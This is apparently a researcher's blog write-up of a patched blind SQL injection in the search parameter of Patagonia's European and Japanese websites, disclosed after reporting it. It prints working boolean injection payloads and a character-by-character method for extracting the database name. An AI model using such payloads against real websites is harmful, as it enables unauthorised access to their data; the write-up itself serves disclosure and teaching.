SQL Injection in Patagonia (European and Japanese) Websites

Hello,

I am a nineteen year old security researcher, who is heavily involved in bug bounties and computer programming. While browsing the European website of Patagonia (eu.patagonia.com) in fall of 2016, I noticed a GET parameter (?k=) behaving oddly. So I entered a standard ' mark to see how it would respond. Here is what I saw:

This peaked my interest, and I started to think this website would be vulnerable to SQL injection. I began messing with it and attempted to create a POC of SQL injection. I noticed when I entered two ' marks, no error would appear and the page would load:

After playing with it for awhile more, I was able to finally craft a working payload! Here it is:

' and substring('a',1,1) like 'a' and 'A' like 'A

returns true (displays an image of a sweater):

' and substring('b',1,1) like 'a' and 'A' like 'A

returns false and displays no image:

Now we can use this to retrieve information like the name of the database. To find the second character of the string, simply increment the first 1 to a 2 and so on for the other characters.

Syntax: ' and substring(database(),1,1) like 'w' and 'A' like 'A

Result: www_patagonia_com

This also effected the Japanese site!!

After discovering this flaw, I immediately reached out to Patagonia, who patched the bug both quickly and effectively. Finding vulnerabilities and helping American companies is my passion, and I plan on making a career of it one day. Let me know what your thoughts/opinions are in the comments! Thanks :)

Jake Murphy
jakedmurphy1@gmail.com